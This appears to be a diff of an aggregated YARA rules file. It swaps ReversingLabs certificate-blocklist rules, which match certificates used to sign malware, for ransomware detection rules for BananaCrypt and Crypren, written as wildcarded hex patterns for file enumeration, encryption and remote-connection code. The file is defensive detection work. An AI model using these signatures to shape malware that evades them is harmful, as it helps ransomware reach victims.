+            33 C9 51 50 53 89 45 ?? 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ??
+            ?? 75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 53 FF 15 ??
+            ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 75 ?? 3B 4D ?? 73 ?? 8B D1 83 E2 ?? B8 ?? ??
+            ?? ?? 2B C2 89 45 ?? 57 03 C1 8D 8D ?? ?? ?? ?? 57 51 E8 ?? ?? ?? ?? 8B 4D ?? 03 4D
+            ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 51 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
+            45 ?? 03 45 ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57
+            50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B 45
+            ?? 83 C4 ?? C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 51 50 56
+            C7 47 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 03 F0 01 45 ?? 8B 55 ?? 6A ??
+            52 56 E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51
+            83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 68
+            ?? ?? ?? ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 83 EE ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 2B F7 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            39 75 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 7D
+            ?? ?? 7E ?? 8B 75 ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 56 FF 15 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 8B 4D ?? 50 51
+            FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO MEDUZA SERVICE GROUP" and pe.signatures [ i ] . serial == "52:3f:b4:03:63:68:dc:26:19:2d:68:82:7f:2d:88:9b" and 1586847880 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enumerate_resources and $enumerate_files and $encrypt_files and $remote_connection_1 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_84F842F6D33Cd2F25B88Dd1710E21137 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bananacrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BananaCrypt ransomware."
 		author = "ReversingLabs"
-		id = "202593d3-d63a-5852-b680-516504d92031"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9e47d094-d7fc-57dd-826c-5321d0219273"
+		date = "2020-09-14"
+		modified = "2020-09-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3902-L3920"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BananaCrypt.yara#L1-L103"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5aad8e95d1306626b63d767fce4706104330dd776b75c09cc404227863564307"
+		logic_hash = "6bde4430e438947b0d7f10c4de11216929ec03af81b3d74f8b7bb8ed134d08d2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BananaCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DataNext s.r.o." and ( pe.signatures [ i ] . serial == "00:84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" or pe.signatures [ i ] . serial == "84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" ) and 1586775720 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4Fbcaa289Ba925B4E247809B6B028202 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "d0c4c6c0-d8e3-5efc-a87b-01d1f98a2c18"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3922-L3938"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c41a4f9ccda54b9735313edf9042b831e6eaca149c089f74a823cee6719e1064"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 55 ?? 89 8D ?? ?? ??
+            ?? 85 D2 74 ?? 8B 45 ?? 85 C0 0F 85 ?? ?? ?? ?? 31 F6 0F B6 13 84 D2 0F 84 ?? ?? ??
+            ?? 8D 43 ?? 88 95 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? 8D BD ?? ?? ?? ?? EB ?? 83 C0 ?? 83
+            C7 ?? 88 57 ?? 39 C1 74 ?? 0F B6 10 84 D2 75 ?? 89 BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            C6 00 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 F0 84
+            C0 0F 85 ?? ?? ?? ?? 8D 5D ?? 8D 76 ?? 8D BC 27 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04
+            24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ??
+            39 F9 89 C8 76 ?? 0F B6 41 ?? 89 CF 3C ?? 0F 95 C1 3C ?? 0F 95 C2 84 D1 0F 84 ?? ??
+            ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C6 07 ?? 8D 7E ?? 39 D8 89 BD ?? ?? ?? ?? 73
+            ?? 0F B6 56 ?? 84 D2 74 ?? 89 F9 8B BD ?? ?? ?? ?? EB ?? 90 0F B6 11 84 D2 74 ?? 83
+            C0 ?? 83 C1 ?? 88 50 ?? 39 D8 75 ?? 89 BD ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 31
+            FF 89 04 24 E8 ?? ?? ?? ?? 85 C0 89 C2 74 ?? 80 38 ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 90
+            83 C7 ?? 80 3C 3A ?? 75 ?? 89 85 ?? ?? ?? ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 89 95
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 46 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 74 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 7C 24 ?? 89 14 24 89
+        }
+		$encrypt_files_p2 = {
+            44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 89 F1 89 04 24 E8 ?? ?? ?? ??
+            83 EC ?? 89 F1 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 89 C7 8D
+            40 ?? 83 F8 ?? 76 ?? 89 F1 83 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F1 E8 ??
+            ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8
+            ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 89
+            F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
+            B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 8D ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8D 74 26 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24
+            E8 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3 8B 45 ?? 89 1C 24 89 44 24 ??
+            8B 45 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 C6 E9 ?? ?? ?? ?? 8D 65 ?? 31 C0 5B 5E 5F 5D
+            C3 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9
+        }
+		$find_files_p1 = {
+            8D 4C 24 ?? 83 E4 ?? FF 71 ?? 55 89 E5 57 56 53 51 81 EC ?? ?? ?? ?? 8B 31 8B 79 ??
+            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 7E ?? 89 74 24 ?? C7 04
+            24 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 8B 04 9F 89 5C 24 ?? 83 C3 ?? C7 04 24 ?? ?? ??
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 39 DE 75 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 47 ?? 89 04 24
+            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89
+            44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D BD ??
+            ?? ?? ?? F3 A5 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 C7 85
+        }
+		$find_files_p2 = {
+            8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ??
+            8D 44 03 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8
+            ?? ?? ?? ?? 89 DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ??
+            A9 ?? ?? ?? ?? 74 ?? 89 C1 00 C1 83 DA ?? C7 02 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7
+            42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 84 C0 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 65 ?? 31 C0 59 5B 5E
+            5F 5D 8D 61 ?? C3 C1 E8 ?? 83 C2 ?? EB ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 89 04 24 B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29
+            F9 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 29 CE 81 C1 ?? ?? ?? ?? C1 E9 ?? 89 45 ?? F3
+        }
+		$find_files_p3 = {
+            A5 89 1C 24 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 C6 74 ?? 89 44 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 34 24 E8 ??
+            ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 89 44 24
+            ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kimjac ApS" and pe.signatures [ i ] . serial == "4f:bc:aa:28:9b:a9:25:b4:e2:47:80:9b:6b:02:82:02" and 1588227220 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1F2E8Effbb08C7Dbcc7A7F2D835457B5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Crypren : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Crypren ransomware."
 		author = "ReversingLabs"
-		id = "cf032593-e742-56d5-a579-3f38a31e2c0c"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9a6ff190-b26b-5b75-9103-95a3b2e80701"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3940-L3956"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Crypren.yara#L1-L144"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0b446641617d435c3d312592957e19c3d391b0149eafcf9ac2da51e8d9080eb4"
+		logic_hash = "7047d48782762e42544063fde6f2be62eb19f22853ea84abb5bce67c962da172"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Crypren"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RTI, OOO" and pe.signatures [ i ] . serial == "1f:2e:8e:ff:bb:08:c7:db:cc:7a:7f:2d:83:54:57:b5" and 1581382360 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Aeba4C39306Fdd022849867801645814 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "f8cb78cf-541c-5038-b7af-83679c978ec8"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3958-L3976"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "82c149f1d8ef93a0df2035690c5cdca935236687bc36a35a84c3d6610eb6902c"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_directories_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
+            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
+            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+        }
+		$enum_directories_p2 = {
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
+            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6
+        }
+		$enum_directories_p3 = {
+            45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 90 83 7F ?? ?? 8B 5F ?? 72 ?? 8B 37 EB ?? 8B F7 83 7D ?? ?? 8D
+            45 ?? 8B D3 0F 43 45 ?? 3B CB 0F 42 D1 85 D2 74 ?? 83 EA ?? 72 ?? 8D 9B ?? ?? ?? ??
+            8B 08 3B 0E 75 ?? 83 C0 ?? 83 C6 ?? 83 EA ?? 73 ?? 83 FA ?? 74 ?? 8A 08 3A 0E 75 ??
+            83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA
+            ?? 74 ?? 8A 40 ?? 3A 46 ?? 74 ?? 1B C0 83 C8 ?? EB ?? 33 C0 8B 4D ?? 85 C0 75 ?? 3B
+            CB 73 ?? 83 C8 ?? EB ?? 33 C0 3B CB 0F 95 C0 85 C0 0F 94 C0 84 C0 75 ?? 8B 85 ?? ??
+            ?? ?? 83 C7 ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? B3 ?? EB ?? 32 DB 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ??
+            72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 33 FF C6 45 ?? ?? 83 7D ?? ?? 8D 45 ?? 6A
+            ?? 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ??
+            0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B
+            94 0D ?? ?? ?? ?? 85 D2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 39 BC 05 ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? F6 C2 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 03 C8 8D 45 ??
+            50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? C6 45 ?? ?? 8B F0
+            85 C9 74 ?? 8B 11 FF 52 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B
+            40 ?? FF D0 88 45 ?? 8D 45 ?? FF 75 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 76 ?? EB ?? 8D A4 24
+            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 0F 43 4D ?? 33 D2
+        }
+		$encrypt_files_p2 = {
+            0F BE 1C 30 8B C7 F7 75 ?? 8A 0C 0A 0F BE C1 03 C3 3D ?? ?? ?? ?? 7C ?? 25 ?? ?? ??
+            ?? 79 ?? 48 0D ?? ?? ?? ?? 40 EB ?? 02 D9 0F B6 C3 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 46 83 C4 ?? 47 3B 75 ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
